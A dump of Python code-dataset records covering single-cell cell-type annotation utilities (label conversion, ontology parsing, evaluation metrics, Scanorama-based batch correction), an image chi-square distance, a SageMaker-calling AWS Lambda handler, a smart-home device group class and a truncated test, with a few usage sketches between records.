:\n\t\t#bin to mat\n\t\tif ncls == -1:\n\t\t\tncls = np.max(labels) + 1 # labels are 0-indexed class ids\n\t\tmat = np.zeros((ncell, ncls))\n\t\tfor i in range(ncell):\n\t\t\tmat[i, labels[i]] = 1\n\t\treturn mat\n\telse:\n\t\tif ncls == -1:\n\t\t\tncls = np.shape(labels)[1]\n\t\tvec = np.zeros(ncell)\n\t\tfor i in range(ncell):\n\t\t\tind = np.where(labels[i,:]!=0)[0]\n\t\t\tassert(len(ind)<=1) # not multilabel classification\n\t\t\tif len(ind)==0:\n\t\t\t\tvec[i] = -1\n\t\t\telse:\n\t\t\t\tvec[i] = ind[0]\n\t\treturn vec\n\ndef MapLabel2CL(test_Y, l2i):\n\t\"\"\"\n\tMaps each label to its class index in l2i; labels missing from l2i become -1\n\t\"\"\"\n\t#for i in range(len(test_Y))\n\t#test_Y_new = np.array([l2i[y] for y in test_Y])\n\t#return test_Y_new\n\ttest_Y_new = []\n\tl2i_set = set(l2i)\n\tcount_NA = 0\n\ttotal = 0\n\tfor y in test_Y:\n\t\ttotal += 1\n\t\tif y not in l2i_set:\n\t\t\tcount_NA += 1\n\t\t\ttest_Y_new.append(-1)\n\t\telse:\n\t\t\ttest_Y_new.append(l2i[y])\n\t#print()\n\t#print(\"Number of 'NA's found in test labels:\", count_NA, \"out of\", total, \"total labels\")\n\treturn np.array(test_Y_new)\n\ndef get_ontology_name(obo_file, lower=True):\n\tfin = open(obo_file)\n\tco2name = {}\n\tname2co = {}\n\ttag_is_syn = {}\n\tfor line in fin:\n\t\tif line.startswith('id: '):\n\t\t\tco = line.strip().split('id: ')[1]\n\t\tif line.startswith('name: '):\n\t\t\tif lower:\n\t\t\t\tname = line.strip().lower().split('name: ')[1]\n\t\t\telse:\n\t\t\t\tname = line.strip().split('name: ')[1]\n\t\t\tco2name[co] = name\n\t\t\tname2co[name] = co\n\t\tif line.startswith('synonym: '):\n\t\t\tif lower:\n\t\t\t\tsyn = line.strip().lower().split('synonym: \"')[1].split('\" ')[0]\n\t\t\telse:\n\t\t\t\tsyn = line.strip().split('synonym: \"')[1].split('\" ')[0]\n\t\t\tif syn in name2co:\n\t\t\t\tcontinue\n\t\t\tname2co[syn] = 
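ConvertLabels converts in both directions, between a class-index vector and a one-hot matrix; a round-trip sketch:

import numpy as np

vec = np.array([0, 2, 1, 2])
mat = ConvertLabels(vec, ncls=3)   # one-hot matrix, shape (4, 3)
back = ConvertLabels(mat)          # back to a class-index vector
assert np.array_equal(back, vec)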
co\n\tfin.close()\n\treturn co2name, name2co\n\ndef knn_ngh(Y2Y):\n\tind = np.argsort(Y2Y*-1, axis=1)\n\treturn ind\n\ndef extend_prediction_2unseen_normalize(pred_Y_seen, onto_net_rwr, nseen, ratio=200):\n\tsys.exit(-1)#NOT USED\n\tncls = np.shape(onto_net_rwr)[0]\n\tonto_net_rwr = onto_net_rwr - np.tile(np.mean(onto_net_rwr, axis = 1), (ncls, 1))\n\tpred_Y_seen_norm = pred_Y_seen / pred_Y_seen.sum(axis=1)[:, np.newaxis]\n\tpred_Y_all = np.dot(pred_Y_seen_norm, onto_net_rwr[:nseen,:])\n\tpred_Y_all[:,:nseen] = normalize(pred_Y_all[:,:nseen],norm='l1',axis=1)\n\tpred_Y_all[:,nseen:] = normalize(pred_Y_all[:,nseen:],norm='l1',axis=1) * ratio\n\treturn pred_Y_all\n\ndef create_nlp_networks(l2i, onto_net, cls2cls, ontology_nlp_file, ontology_nlp_emb_file):\n\tncls = np.shape(cls2cls)[0]\n\t_, _, onto_nlp_emb = read_cell_ontology_nlp(l2i, ontology_nlp_file = ontology_nlp_file, ontology_nlp_emb_file = ontology_nlp_emb_file)\n\tonto_net_nlp_all_pairs = (cosine_similarity(onto_nlp_emb) + 1 ) /2#1 - spatial.distance.cosine(onto_nlp_emb, onto_nlp_emb)\n\tonto_net_nlp = np.zeros((ncls, ncls))\n\tonto_net_bin = np.zeros((ncls, ncls))\n\tstack_net_bin = np.zeros((ncls, ncls))\n\tstack_net_nlp = np.zeros((ncls, ncls))\n\n\tfor n1 in onto_net:\n\t\tfor n2 in onto_net[n1]:\n\t\t\tif n1==n2:\n\t\t\t\tcontinue\n\t\t\tstack_net_nlp[n2,n1] = onto_net_nlp_all_pairs[n2, n1]\n\t\t\tstack_net_nlp[n1,n2] = onto_net_nlp_all_pairs[n1, n2]\n\t\t\tstack_net_bin[n1,n2] = 1\n\t\t\tstack_net_bin[n2,n1] = 1\n\tfor n1 in range(ncls):\n\t\tfor n2 in range(ncls):\n\t\t\tif cls2cls[n1,n2] == 1 or cls2cls[n2,n1] == 1:\n\t\t\t\tonto_net_nlp[n1,n2] = onto_net_nlp_all_pairs[n1, n2]\n\t\t\t\tonto_net_nlp[n2,n1] = onto_net_nlp_all_pairs[n2, n1]\n\t\t\t\tonto_net_bin[n1,n2] = 1\n\t\t\t\tonto_net_bin[n2,n1] = 1\n\treturn onto_net_nlp, onto_net_bin, stack_net_nlp, stack_net_bin, onto_net_nlp_all_pairs\n\n\ndef create_consensus_networks(rsts, onto_net_mat, onto_net_nlp_all_pairs, cls2cls, diss=[2,3], thress=[1,0.8]):\n\tcls2cls_sp = graph_shortest_path(cls2cls,method='FW',directed =False)\n\tncls = np.shape(onto_net_mat)[0]\n\tnetworks = []\n\tfor rst in rsts:\n\t\tfor dis in diss:\n\t\t\tfor thres in thress:\n\t\t\t\tuse_net = np.copy(onto_net_mat)\n\t\t\t\tuse_net[(cls2cls_sp<=dis)&(onto_net_nlp_all_pairs > thres)] = onto_net_nlp_all_pairs[(cls2cls_sp<=dis)&(onto_net_nlp_all_pairs > thres)]\n\t\t\t\tonto_net_rwr = RandomWalkRestart(use_net, rst)\n\t\t\t\tnetworks.append(onto_net_rwr)\n\treturn networks\n\ndef extend_prediction_2unseen(pred_Y_seen, networks, nseen, ratio=200, use_normalize=False):\n\tif not isinstance(networks, list):\n\t\tnetworks = [networks]\n\tpred_Y_all_totoal = 0.\n\tfor onto_net_rwr in networks:\n\t\tif use_normalize:\n\t\t\tonto_net_rwr = onto_net_rwr - np.tile(np.mean(onto_net_rwr, axis = 1), (np.shape(onto_net_rwr)[0], 1))\n\t\tpred_Y_seen_norm = pred_Y_seen / pred_Y_seen.sum(axis=1)[:, np.newaxis]\n\t\tpred_Y_all = np.dot(pred_Y_seen_norm, onto_net_rwr[:nseen,:])\n\t\tpred_Y_all[:,:nseen] = normalize(pred_Y_all[:,:nseen],norm='l1',axis=1)\n\t\tpred_Y_all[:,nseen:] = normalize(pred_Y_all[:,nseen:],norm='l1',axis=1) * ratio\n\t\tpred_Y_all_totoal += pred_Y_all\n\treturn pred_Y_all_totoal\n\ndef my_auprc(y_true, y_pred):\n\tprecision, recall, thresholds = precision_recall_curve(y_true, y_pred)\n\tarea = auc(recall, precision)\n\treturn area\n\ndef sampled_auprc(truths,preds):\n\tpos = np.where(truths == 1)[0]\n\tneg = np.where(truths == 0)[0]\n\tassert(len(pos) + len(neg) == len(truths))\n\tnneg = 
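extend_prediction_2unseen pushes row-normalised seen-class scores through a random-walk propagation matrix, so unseen columns inherit mass from related seen classes; a toy sketch with a uniform graph standing in for the real ontology network:

import numpy as np

nseen, ncls = 2, 4
pred_seen = np.array([[0.9, 0.1],
                      [0.2, 0.8]])                   # 2 cells x 2 seen classes
rwr = RandomWalkRestart(np.ones((ncls, ncls)), 0.7)  # toy propagation matrix
pred_all = extend_prediction_2unseen(pred_seen, rwr, nseen)
print(pred_all.shape)                                # (2, 4): scores over all classes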
len(neg)\n\tnpos = len(pos)\n\tselect_neg = neg[np.random.choice(nneg, npos*3, replace = True)] # sample indices of actual negative cells\n\tselect_ind = np.concatenate((pos, select_neg))\n\treturn average_precision_score(truths[select_ind], preds[select_ind])\n\ndef evaluate(Y_pred_mat, Y_truth_vec, unseen_l, nseen, Y_truth_bin_mat = None, Y_pred_vec = None, Y_ind=None, Y_net = None, Y_net_mat = None, write_screen = True, write_to_file = None, combine_unseen = False, prefix='', metrics = ['AUROC(seen)','AUPRC(seen)','AUROC','AUPRC','AUROC(unseen)', 'AUPRC(unseen)','Accuracy@3','Accuracy@5']):\n\t#preprocess scores\n\tunseen_l = np.array(list(unseen_l))\n\tncell,nclass = np.shape(Y_pred_mat)\n\tnseen = nclass - len(unseen_l)\n\tif Y_ind is not None:\n\t\tnon_Y_ind = np.array(list(set(range(nclass)) - set(Y_ind)))\n\t\tif len(non_Y_ind)>0:\n\t\t\tY_pred_mat[:,non_Y_ind] = -1 * np.inf\n\tif Y_pred_vec is None:\n\t\tY_pred_vec = np.argmax(Y_pred_mat, axis=1)\n\tif Y_truth_bin_mat is None:\n\t\tY_truth_bin_mat = ConvertLabels(Y_truth_vec, nclass)\n\n\tY_pred_bin_mat = ConvertLabels(Y_pred_vec, nclass)\n\n\t#class-based metrics\n\tclass_auc_macro = np.full(nclass, np.nan)\n\tclass_auprc_macro = np.full(nclass, np.nan)\n\tclass_f1 = np.full(nclass, np.nan)\n\tfor i in range(nclass):\n\t\tif len(np.unique(Y_truth_bin_mat[:,i]))==2 and np.sum(Y_truth_bin_mat[:,i])>=10:\n\t\t\tclass_auc_macro[i] = roc_auc_score(Y_truth_bin_mat[:,i], Y_pred_mat[:,i])\n\t\t\tclass_auprc_macro[i] = sampled_auprc(Y_truth_bin_mat[:,i], Y_pred_mat[:,i])\n\t\t\tclass_f1[i] = f1_score(Y_truth_bin_mat[:,i], Y_pred_bin_mat[:,i])\n\n\n\t#sample-based metrics\n\textend_acc, extend_Y = extend_accuracy(Y_truth_vec, Y_pred_vec, Y_net, unseen_l)\n\tkappa = cohen_kappa_score(Y_pred_vec, Y_truth_vec)\n\textend_kappa = cohen_kappa_score(extend_Y, Y_truth_vec)\n\taccuracy = accuracy_score(Y_truth_vec, Y_pred_vec)\n\tprec_at_k_3 = precision_at_k(Y_pred_mat, Y_truth_vec, 3)\n\tprec_at_k_5 = precision_at_k(Y_pred_mat, Y_truth_vec, 5)\n\n\t#print ([(x,np.sum(Y_truth_bin_mat[:,unseen_l[i]])) for i,x in enumerate(class_auprc_macro[unseen_l]) if not np.isnan(x)])\n\tseen_auc_macro = np.nanmean(class_auc_macro[:nseen])\n\tseen_auprc_macro = np.nanmean(class_auprc_macro[:nseen])\n\tseen_f1 = np.nanmean(class_f1[:nseen])\n\tif len(unseen_l) == 0:\n\t\tunseen_auc_macro = 0\n\t\tunseen_auprc_macro = 0\n\t\tunseen_f1 = 0\n\telse:\n\t\tunseen_auc_macro = np.nanmean(class_auc_macro[unseen_l])\n\t\t#unseen_auprc_macro = np.nanmean([x for i,x in enumerate(class_auprc_macro[unseen_l]) if np.sum(Y_truth_bin_mat[:,unseen_l[i]])>100])#\n\t\tunseen_auprc_macro = np.nanmean(class_auprc_macro[unseen_l])\n\t\tunseen_f1 = np.nanmean(class_f1[unseen_l])\n\n\tall_v = {'AUROC':np.nanmean(class_auc_macro), 'AUPRC': np.nanmean(class_auprc_macro), 'AUROC(seen)':seen_auc_macro, 'AUPRC(seen)': seen_auprc_macro, 'AUROC(unseen)':unseen_auc_macro, 'AUPRC(unseen)': unseen_auprc_macro, 'Cohens Kappa':extend_kappa, 'Accuracy@3':prec_at_k_3, 'Accuracy@5':prec_at_k_5}\n\tres_v = {}\n\tfor metric in metrics:\n\t\tres_v[metric] = all_v[metric]\n\n\tif write_screen:\n\t\tprint (prefix, end='\\t')\n\t\tfor v in metrics:\n\t\t\tprint ('%.4f'%res_v[v], end='\\t')\n\t\tprint ('')\n\t\tsys.stdout.flush()\n\tif write_to_file is not None:\n\t\twrite_to_file.write(prefix+'\\t')\n\t\tfor v in metrics:\n\t\t\twrite_to_file.write('%.2f\\t'%res_v[v])\n\t\twrite_to_file.write('\\n')\n\t\twrite_to_file.flush()\n\treturn res_v\n\ndef precision_at_k(pred,truth,k):\n\tncell, nclass = np.shape(pred)\n\thit = 0.\n\tfor i in 
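sampled_auprc subsamples three negatives per positive before computing average precision, which keeps the metric tractable on very imbalanced classes; a toy call on synthetic labels (the value varies with the numpy random state):

import numpy as np

truths = np.array([1, 0, 0, 0, 0, 0, 0, 1])
preds = np.array([0.9, 0.1, 0.2, 0.3, 0.05, 0.4, 0.2, 0.8])
np.random.seed(0)
print(sampled_auprc(truths, preds))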
range(ncell):\n\t\tx = np.argsort(pred[i,:]*-1)\n\t\trank = np.where(x==truth[i])[0][0]\n\t\tif rank < k:\n\t\t\thit += 1.\n\tprec = hit / ncell\n\treturn prec\n\ndef write_anndata_data(test_label, test_AnnData, cl_obo_file, i2tp):\n\t# i2tp maps a predicted class index to its Cell Ontology term id\n\tif len(np.shape(test_label))==2:\n\t\ttest_label = np.argmax(test_label, axis = 1)\n\tco2name, name2co = get_ontology_name(cl_obo_file)\n\tx = test_AnnData\n\tncell = np.shape(x.X)[0]\n\tprint (ncell, len(test_label))\n\tassert(ncell == len(test_label))\n\ttest_name = []\n\ttest_label_id = []\n\tfor i in range(ncell):\n\t\txx = i2tp[test_label[i]]\n\t\ttest_label_id.append(xx)\n\t\ttest_name.append(co2name[xx])\n\ttest_name = np.array(test_name)\n\ttest_label_id = np.array(test_label_id)\n\tx.obs['OnClass_annotation_ontology_ID'] = test_label_id\n\tx.obs['OnClass_annotation_ontology_name'] = test_name\n\treturn x\n\n\ndef read_type2genes(g2i, marker_gene,cl_obo_file):\n\tco2name, name2co = get_ontology_name(cl_obo_file)\n\n\tc2cnew = {}\n\tc2cnew['cd4+ t cell'] = 'CD4-positive, CXCR3-negative, CCR6-negative, alpha-beta T cell'.lower()\n\tc2cnew['chromaffin cells (enterendocrine)'] = 'chromaffin cell'.lower()\n\n\n\tc2cnew['mature NK T cell'] = 'mature NK T cell'.lower()\n\tc2cnew['cd8+ t cell'] = 'CD8-positive, alpha-beta cytotoxic T cell'.lower()\n\tfin = open(marker_gene)\n\tfin.readline()\n\ttp2genes = {}\n\tunfound = set()\n\tfor line in fin:\n\t\tw = line.strip().split('\\t')\n\t\tc1 = w[1].lower()\n\t\tc2 = w[2].lower()\n\t\tgenes = []\n\t\tfor ww in w[8:]:\n\t\t\tif ww.upper() in g2i:\n\t\t\t\tgenes.append(ww.upper())\n\t\tif len(genes)==0:\n\t\t\tcontinue\n\t\tif c1.endswith('s') and c1[:-1] in name2co:\n\t\t\tc1 = c1[:-1]\n\t\tif c2.endswith('s') and c2[:-1] in name2co:\n\t\t\tc2 = c2[:-1]\n\t\tif c1 + ' cell' in name2co:\n\t\t\tc1 +=' cell'\n\t\tif c2 + ' cell' in name2co:\n\t\t\tc2 +=' cell'\n\t\tif c1 in c2cnew:\n\t\t\tc1 = c2cnew[c1]\n\t\tif c2 in c2cnew:\n\t\t\tc2 = c2cnew[c2]\n\t\tif c1 in name2co:\n\t\t\ttp2genes[name2co[c1]] = genes\n\t\telse:\n\t\t\tunfound.add(c1)\n\t\tif c2 in name2co:\n\t\t\ttp2genes[name2co[c2]] = genes\n\t\telse:\n\t\t\tunfound.add(c2)\n\tfin.close()\n\n\treturn tp2genes\n\n\ndef extend_accuracy(test_Y, test_Y_pred_vec, Y_net, unseen_l):\n\tunseen_l = set(unseen_l)\n\tn = len(test_Y)\n\tacc = 0.\n\tntmp = 0.\n\tnew_pred = []\n\tfor i in range(n):\n\t\tif test_Y[i] in unseen_l and test_Y_pred_vec[i] in unseen_l:\n\t\t\tif test_Y_pred_vec[i] in Y_net[test_Y[i]] and Y_net[test_Y[i]][test_Y_pred_vec[i]] == 1:\n\t\t\t\tacc += 1\n\t\t\t\tntmp += 1\n\t\t\t\tnew_pred.append(test_Y[i])\n\t\t\telse:\n\t\t\t\tnew_pred.append(test_Y_pred_vec[i])\n\t\telse:\n\t\t\tif test_Y[i] == test_Y_pred_vec[i]:\n\t\t\t\tacc += 1\n\t\t\tnew_pred.append(test_Y_pred_vec[i])\n\tnew_pred = np.array(new_pred)\n\treturn acc/n, new_pred\n\n\ndef run_scanorama_multiply_datasets(datasets, genes, scan_dim = 100):\n\tsparse_datasets = []\n\tfor dataset in datasets:\n\t\tsparse_datasets.append(sparse.csr_matrix(dataset))\n\tdatasets, genes = merge_datasets(sparse_datasets, genes)\n\tdatasets_dimred, genes = process_data(datasets, genes, dimred=scan_dim)\n\tdatasets_dimred, sparse_dataset_correct = my_assemble(datasets_dimred, expr_datasets = datasets, sigma=150)\n\tdataset_correct = []\n\tfor sp in sparse_dataset_correct:\n\t\tdataset_correct.append(np.power(sp.todense(), 2))\n\treturn datasets_dimred, dataset_correct\n\n\ndef run_scanorama_same_genes(features, batch_labels, scan_dim = 100):\n\tbatchs = np.unique(batch_labels)\n\tnbatch = 
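extend_accuracy treats a prediction of an unseen type as correct when the predicted and true terms are neighbours in the ontology network Y_net; a toy sketch with a two-node ontology fragment:

import numpy as np

Y_net = {2: {3: 1}, 3: {2: 1}}     # toy ontology: classes 2 and 3 are adjacent
acc, new_pred = extend_accuracy(np.array([2, 0]), np.array([3, 0]),
                                Y_net, unseen_l={2, 3})
print(acc)   # 1.0: the 2->3 confusion is forgiven, and 0 matches exactly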
len(batchs)\n\tif nbatch == 1:\n\t\treturn features\n\tncell, ngene = np.shape(features)\n\tassert(ncell == len(batch_labels))\n\tgenes = []\n\tdatasets = []\n\tindexs = []\n\tfor i in range(nbatch):\n\t\tgenes.append(np.array(range(ngene)))\n\t\tindex = np.where(batch_labels == batchs[i])[0]\n\t\tdataset = features[index,:]\n\t\tprint (batchs[i], np.shape(dataset))\n\t\tdatasets.append(dataset)\n\t\tindexs.append(index)\n\t_, dataset_correct = run_scanorama_multiply_datasets(datasets, genes, scan_dim = scan_dim)\n\tassert(len(dataset_correct) == nbatch)\n\tfor i in range(nbatch):\n\t\tfeatures[indexs[i],:] = dataset_correct[i]\n\treturn features\n\n\ndef my_assemble(datasets, verbose=VERBOSE, view_match=False, knn=KNN,\n\t\t\t sigma=SIGMA, approx=APPROX, alpha=ALPHA, expr_datasets=None,\n\t\t\t ds_names=None, batch_size=None,\n\t\t\t geosketch=False, geosketch_max=20000, alignments=None, matches=None): # reimplement part of scanorama to return the corrected expression (instead of low-d vectors)\n\t#this code is copied from scanorama in order to output the expression. Please check their tool and cite their paper if you use this function.\n\tif len(datasets) == 1:\n\t\treturn datasets\n\n\tif alignments is None and matches is None:\n\t\talignments, matches = find_alignments(\n\t\t\tdatasets, knn=knn, approx=approx, alpha=alpha, verbose=verbose,\n\t\t)\n\n\tds_assembled = {}\n\tpanoramas = []\n\tct = 0\n\tfor i, j in alignments:\n\t\tct += 1\n\t\tprint (ct)\n\t\tsys.stdout.flush()\n\t\tif verbose:\n\t\t\tif ds_names is None:\n\t\t\t\tprint('Processing datasets {}'.format((i, j)))\n\t\t\telse:\n\t\t\t\tprint('Processing datasets {} <=> {}'.\n\t\t\t\t\t format(ds_names[i], ds_names[j]))\n\n\t\t# Only consider a dataset a fixed amount of times.\n\t\tif not i in ds_assembled:\n\t\t\tds_assembled[i] = 0\n\t\tds_assembled[i] += 1\n\t\tif not j in ds_assembled:\n\t\t\tds_assembled[j] = 0\n\t\tds_assembled[j] += 1\n\t\tif ds_assembled[i] > 3 and ds_assembled[j] > 3:\n\t\t\tcontinue\n\n\t\t# See if datasets are involved in any current panoramas.\n\t\tpanoramas_i = [ panoramas[p] for p in range(len(panoramas))\n\t\t\t\t\t\tif i in panoramas[p] ]\n\t\tassert(len(panoramas_i) <= 1)\n\t\tpanoramas_j = [ panoramas[p] for p in range(len(panoramas))\n\t\t\t\t\t\tif j in panoramas[p] ]\n\t\tassert(len(panoramas_j) <= 1)\n\n\t\tif len(panoramas_i) == 0 and len(panoramas_j) == 0:\n\t\t\tif datasets[i].shape[0] < datasets[j].shape[0]:\n\t\t\t\ti, j = j, i\n\t\t\tpanoramas.append([ i ])\n\t\t\tpanoramas_i = [ panoramas[-1] ]\n\n\t\t# Map dataset i to panorama j.\n\t\tif len(panoramas_i) == 0:\n\t\t\tcurr_ds = datasets[i]\n\t\t\tcurr_ref = np.concatenate([ datasets[p] for p in panoramas_j[0] ])\n\n\t\t\tmatch = []\n\t\t\tbase = 0\n\t\t\tfor p in panoramas_j[0]:\n\t\t\t\tif i < p and (i, p) in matches:\n\t\t\t\t\tmatch.extend([ (a, b + base) for a, b in matches[(i, p)] ])\n\t\t\t\telif i > p and (p, i) in matches:\n\t\t\t\t\tmatch.extend([ (b, a + base) for a, b in matches[(p, i)] ])\n\t\t\t\tbase += datasets[p].shape[0]\n\n\t\t\tds_ind = [ a for a, _ in match ]\n\t\t\tref_ind = [ b for _, b in match ]\n\n\t\t\tbias = transform(curr_ds, curr_ref, ds_ind, ref_ind, sigma=sigma,\n\t\t\t\t\t\t\t batch_size=batch_size)\n\t\t\tdatasets[i] = curr_ds + bias\n\n\t\t\tif expr_datasets:\n\t\t\t\tcurr_ds = expr_datasets[i]\n\t\t\t\tcurr_ref = vstack([ expr_datasets[p]\n\t\t\t\t\t\t\t\t\tfor p in panoramas_j[0] ])\n\t\t\t\tbias = transform(curr_ds, curr_ref, ds_ind, ref_ind,\n\t\t\t\t\t\t\t\t sigma=sigma, cn=True, 
batch_size=batch_size)\n\t\t\t\texpr_datasets[i] = curr_ds + bias\n\n\t\t\tpanoramas_j[0].append(i)\n\n\t\t# Map dataset j to panorama i.\n\t\telif len(panoramas_j) == 0:\n\t\t\tcurr_ds = datasets[j]\n\t\t\tcurr_ref = np.concatenate([ datasets[p] for p in panoramas_i[0] ])\n\n\t\t\tmatch = []\n\t\t\tbase = 0\n\t\t\tfor p in panoramas_i[0]:\n\t\t\t\tif j < p and (j, p) in matches:\n\t\t\t\t\tmatch.extend([ (a, b + base) for a, b in matches[(j, p)] ])\n\t\t\t\telif j > p and (p, j) in matches:\n\t\t\t\t\tmatch.extend([ (b, a + base) for a, b in matches[(p, j)] ])\n\t\t\t\tbase += datasets[p].shape[0]\n\n\t\t\tds_ind = [ a for a, _ in match ]\n\t\t\tref_ind = [ b for _, b in match ]\n\n\t\t\tbias = transform(curr_ds, curr_ref, ds_ind, ref_ind, sigma=sigma,\n\t\t\t\t\t\t\t batch_size=batch_size)\n\t\t\tdatasets[j] = curr_ds + bias\n\n\t\t\tif expr_datasets:\n\t\t\t\tcurr_ds = expr_datasets[j]\n\t\t\t\tcurr_ref = vstack([ expr_datasets[p]\n\t\t\t\t\t\t\t\t\tfor p in panoramas_i[0] ])\n\t\t\t\tbias = transform(curr_ds, curr_ref, ds_ind, ref_ind, sigma=sigma,\n\t\t\t\t\t\t\t\t cn=True, batch_size=batch_size)\n\t\t\t\texpr_datasets[j] = curr_ds + bias\n\n\t\t\tpanoramas_i[0].append(j)\n\n\t\t# Merge two panoramas together.\n\t\telse:\n\t\t\tcurr_ds = np.concatenate([ datasets[p] for p in panoramas_i[0] ])\n\t\t\tcurr_ref = np.concatenate([ datasets[p] for p in panoramas_j[0] ])\n\n\t\t\t# Find base indices into each panorama.\n\t\t\tbase_i = 0\n\t\t\tfor p in panoramas_i[0]:\n\t\t\t\tif p == i: break\n\t\t\t\tbase_i += datasets[p].shape[0]\n\t\t\tbase_j = 0\n\t\t\tfor p in panoramas_j[0]:\n\t\t\t\tif p == j: break\n\t\t\t\tbase_j += datasets[p].shape[0]\n\n\t\t\t# Find matching indices.\n\t\t\tmatch = []\n\t\t\tbase = 0\n\t\t\tfor p in panoramas_i[0]:\n\t\t\t\tif p == i and j < p and (j, p) in matches:\n\t\t\t\t\tmatch.extend([ (b + base, a + base_j)\n\t\t\t\t\t\t\t\t for a, b in matches[(j, p)] ])\n\t\t\t\telif p == i and j > p and (p, j) in matches:\n\t\t\t\t\tmatch.extend([ (a + base, b + base_j)\n\t\t\t\t\t\t\t\t for a, b in matches[(p, j)] ])\n\t\t\t\tbase += datasets[p].shape[0]\n\t\t\tbase = 0\n\t\t\tfor p in panoramas_j[0]:\n\t\t\t\tif p == j and i < p and (i, p) in matches:\n\t\t\t\t\tmatch.extend([ (a + base_i, b + base)\n\t\t\t\t\t\t\t\t for a, b in matches[(i, p)] ])\n\t\t\t\telif p == j and i > p and (p, i) in matches:\n\t\t\t\t\tmatch.extend([ (b + base_i, a + base)\n\t\t\t\t\t\t\t\t for a, b in matches[(p, i)] ])\n\t\t\t\tbase += datasets[p].shape[0]\n\n\t\t\tds_ind = [ a for a, _ in match ]\n\t\t\tref_ind = [ b for _, b in match ]\n\n\t\t\t# Apply transformation to entire panorama.\n\t\t\tbias = transform(curr_ds, curr_ref, ds_ind, ref_ind, sigma=sigma,\n\t\t\t\t\t\t\t batch_size=batch_size)\n\t\t\tcurr_ds += bias\n\t\t\tbase = 0\n\t\t\tfor p in panoramas_i[0]:\n\t\t\t\tn_cells = datasets[p].shape[0]\n\t\t\t\tdatasets[p] = curr_ds[base:(base + n_cells), :]\n\t\t\t\tbase += n_cells\n\n\t\t\tif not expr_datasets is None:\n\t\t\t\tcurr_ds = vstack([ expr_datasets[p]\n\t\t\t\t\t\t\t\t for p in panoramas_i[0] ])\n\t\t\t\tcurr_ref = vstack([ expr_datasets[p]\n\t\t\t\t\t\t\t\t\tfor p in panoramas_j[0] ])\n\t\t\t\tbias = transform(curr_ds, curr_ref, ds_ind, ref_ind,\n\t\t\t\t\t\t\t\t sigma=sigma, cn=True, batch_size=batch_size)\n\t\t\t\tcurr_ds += bias\n\t\t\t\tbase = 0\n\t\t\t\tfor p in panoramas_i[0]:\n\t\t\t\t\tn_cells = expr_datasets[p].shape[0]\n\t\t\t\t\texpr_datasets[p] = curr_ds[base:(base + n_cells), :]\n\t\t\t\t\tbase += n_cells\n\n\t\t\t# Merge panoramas i and j and delete 
one.\n\t\t\tif panoramas_i[0] != panoramas_j[0]:\n\t\t\t\tpanoramas_i[0] += panoramas_j[0]\n\t\t\t\tpanoramas.remove(panoramas_j[0])\n\n\t\t# Visualize.\n\t\tif view_match:\n\t\t\tplot_mapping(curr_ds, curr_ref, ds_ind, ref_ind)\n\n\treturn datasets, expr_datasets\n","sub_path":"OnClassTorch/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":62202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"133247710","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport numpy as np\n\n\ndef chi_square(query_feature, match_feature) -> float:\n \"\"\"\n Chi-square test\n :param query_feature: query image feature\n :param match_feature: match image feature\n :return: chi-square distance\n \"\"\"\n\n distance = 0.5 * np.sum(\n [((a - b) ** 2) / (a + b + 1e-10)\n for (a, b) in zip(match_feature, query_feature)]\n )\n return float(distance)\n\n\n","sub_path":"hsv_image_search/mlibs/image_match.py","file_name":"image_match.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"599806085","text":"import io\nimport boto3\nimport json\nimport csv\nimport numpy as np\nimport requests as req\n\n# grab environment variables\nENDPOINT_NAME = \"DEMO-linear-endpoint-201904200249\"\nruntime = boto3.client('runtime.sagemaker')\n\n\ndef lambda_handler(event, context):\n statusCode = 200\n predicted_label = \"\"\n try:\n s = \"GET\" if event[\"httpMethod\"] == \"GET\" else \"POST\"\n data = json.loads(json.dumps(event))\n payload = data['data']\n\n response = runtime.invoke_endpoint(EndpointName=ENDPOINT_NAME,\n ContentType='text/csv',\n Body=\",\".join(payload))\n print(response)\n result = json.loads(response['Body'].read().decode())\n print(result)\n test_pred = np.array([r['score'] for r in result['predictions']])\n test_pred_class = (test_pred > 0.5) + 0\n pred = int(test_pred_class[0])\n predicted_label = 'M' if pred == 1 else 'B'\n except KeyError:\n s = \"Bad\"\n statusCode = 400\n\n d = {\n \"status\": statusCode,\n \"Message\": \"That was a {} request\".format(s),\n \"event\": \"\"\n }\n if statusCode == 200:\n d[\"label\"] = predicted_label\n return d\n","sub_path":"lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"210775302","text":"from selve.utils import *\nfrom selve.communication import *\nimport logging\n_LOGGER = logging.getLogger(__name__)\n\nclass Group():\n ## A group consists of multiple devices. 
We have to treat it like a device.\n\n def __init__(self, gateway, ID, communicationType, discover = False):\n self.ID = ID\n self.gateway = gateway\n self.mask = singlemask(ID)\n self.device_type = DeviceType.UNKNOWN ## Device type according to devices in group\n self.communicationType = communicationType\n self.name = \"Not defined\"\n if discover:\n self.discover_properties()\n \n def executeCommand(self, commandType, automatic = False):\n if automatic:\n command = CommeoDeviceCommand(self.mask, commandType)\n else:\n command = CommeoDeviceCommand(self.mask, commandType)\n command.execute(self.gateway)\n return command\n\n # def discover_properties(self):\n # command = CommeoDeviceGetValues(self.ID)\n # command.execute(self.gateway)\n # self.device_type = command.deviceType\n # self.name = command.name\n\n ## Actor ##\n\n\n ## Sensor ##\n\n\n ## SenSim ##\n\n\n ## Sender ##\n\n\n ## Iveo ##\n\n\n \n\n \n def __str__(self):\n return \"Device \" + self.device_type.name + \" of type: \" + self.communicationType + \" on channel \" + str(self.ID) + \" with name \" + self.name","sub_path":"selve/group.py","file_name":"group.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"165599986","text":"from datetime import datetime, timedelta\nfrom src.models import RouteMetrics\nfrom src.queries.get_route_metrics import get_route_metrics\n\n\ndef test_get_route_metrics(db_mock):\n \"\"\"Tests that the route metrics are queried correctly from db data\"\"\"\n\n date = datetime.utcnow().replace(minute=0, second=0, microsecond=0)\n before_all_date = (date + timedelta(hours=-2))\n before_date = (date + timedelta(hours=-1))\n\n route_metrics = [{\n 'version': '1',\n 'route_path': 'tracks/some_hash',\n 'query_string': '',\n 'count': 